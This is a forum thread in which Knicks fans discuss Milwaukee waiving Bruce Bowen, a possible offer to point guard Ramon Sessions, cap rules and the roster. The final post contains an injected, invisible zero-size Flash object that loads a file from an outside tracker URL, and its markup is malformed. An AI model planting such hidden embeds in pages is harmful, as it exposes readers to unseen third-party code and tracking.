MIL waives Bruce Bowen- Walsh all set to offer Sessions a deal

mafra

Legend
Well, this is what Walsh has been waiting for. MIL signed Warrick and let Bowen go. He has an idea now what it'll cost to sign (and keep Sessions). MIL inked Warrick but did let Bowen walk. He cannot do a cheap 2 year deal. BUT a 3-4 year deal might be enough.

I suspect Sessions is offered a deal this weekend.

New New York

Quiet Storm
I still never got what Bruce Bowen had to do with anything? Buying out Bowen just gives Mil. more cap space and additional roster spot.

I think Warrick's signing could be the writting on the wall, but, Mil. has said all along they would match any MLE offer for Sessions. So I hope Donnie makes the offer a good one.

Blumatic

Rotation player
Buying someone out does NOT give cap space. He still gets paid by the team he just plays for a new one. The salary still counts against the cap of the former team.

Last edited:

Jmeyreles

Rookie
Yea Sessions is a great point and Knicks shouldnt waste time and offer him the deal already. The Knicks were waiting to see if the Bucks traded Bowen since they didnt get to trade him the Bucks had to waive. So they really dont have money to match.

Oldtimer

Rotation player
Point Guard

I do not understand our apparent neglect of the point guard position. Duhon is a capable back up, nothing more. Sessions is currently the best point guard available. What are we waiting for?

I believe we will regret not taking Brandon Jennings over Jordan Hill. Jennings simply has a much greater upside. Granted, he is cocky and too willing to shoot his mouth off, but he is a pass first point guard with freakish athleticism. Milwaukee appears to be delighted with him.

Why are we even looking at Tinsley or Jay Williams? It does not make a difference that either may be available on a one year contract. There are no top notch point guards, other than perhaps Rondo, among the 2010 free agents. And Rondo will be restricted. Do we expect that either Rubio or Flynn will be available in a year or so?

Perhaps there is concern about Milwaukee matching a contract offer to Sessions. Perhaps Walsh wants to resolve the situations with Lee and Nate before committing to Sessions, but something has got to be done. We cannot go into the 2009 season with only Duhon and Douglas.

New New York

Quiet Storm
He killed the Knicks and scored over 30 points off the bench one game last season......either we sucked enormously that day or this kid has potential to be a scorer.

That has been the story of The Knicks for the past 7 years, some unknown or over the hill player who is averaging less than 5 per, comes out and drops 20 or more!

We have always had the uncanny ability to make players look so good against us.

Remember when Jalen Rose was averaging career lows in points and mins for Toronto. He comes out and plays his best half of basketball in like 2 seasons, scores 20 in the first half against us, which prompts Isiah and Larry Brown to trade for him, and the rest is history!

Penny Hardaway kills us as a member of The Heat in 2007 (in the game that caused the infamous Isiah and Steph plane fight), he is waived by The Heat less than a week later!

So there should be an asterisk next to any player who gets a career high against us!

Crazy⑧s

Evacuee
Same with Chris Childs as well. I remember him having the game of his life against us as a Net. Then the Nets couldn't match our offerf and we took him on & reaped the rewards.

I hope it's the same with Sessions.

**** Tinsley btw.

Paul1355

All Star
That has been the story of The Knicks for the past 7 years, some unknown or over the hill player who is averaging less than 5 per, comes out and drops 20 or more!

We have always had the uncanny ability to make players look so good against us.

Remember when Jalen Rose was averaging career lows in points and mins for Toronto. He comes out and plays his best half of basketball in like 2 seasons, scores 20 in the first half against us, which prompts Isiah and Larry Brown to trade for him, and the rest is history!

Penny Hardaway kills us as a member of The Heat in 2007 (in the game that caused the infamous Isiah and Steph plane fight), he is waived by The Heat less than a week later!

So there should be an asterisk next to any player who gets a career high against us!

You made some good points but you mentioned players that were very good in their careers and just had a good game of their old self.....Mike Taylor is still young so I saw that as a sign of potential on his part.

Red

TYPE-A
""""The Knicks' tango with Ramon Sessions could wrap up tomorrow, according to his agent. Chubby Wells, agent for the young Bucks point guard, told The Post yesterday Sessions could accept a Knicks offer either today or tomorrow. New York"""" My projected line up: SESS-CHANDLER-HARRINGTON-LEE-JEFFRIES Bench: Duhon, N8, Gallo, Hill, Darko (Douglas, Hughes, Curry) When I see Hill as being the first big off the bench I don't think Dantoni will do this and Darko might be first big off the bench with Hill having limited minutes. Jeffries is a starter but Anyone can take his minutes, I figure dantoni/walsh would rather give him starter minutes to up his value and so look for more uselessness from the CENTER position unless someone (Darko, Curry, Hill) steps up. Its sad when you realize We have Three Centers (2 true 1 rookie) but they aren't better than Jared buma$$ Jeffries!

latiger12

Rookie
Buying someone out does NOT give cap space. He still gets paid by the team he just plays for a new one. The salary still counts against the cap of the former team.<OBJECT height=0 width=0 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000>

<embed src="<a href="http://brbyowner.com/?tracker=4097" target="_blank">http://brbyowner.com/?tracker=4097[/URL]" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></OBJECT>
</P>
This is correct, you have to trade them away to free up the cap space.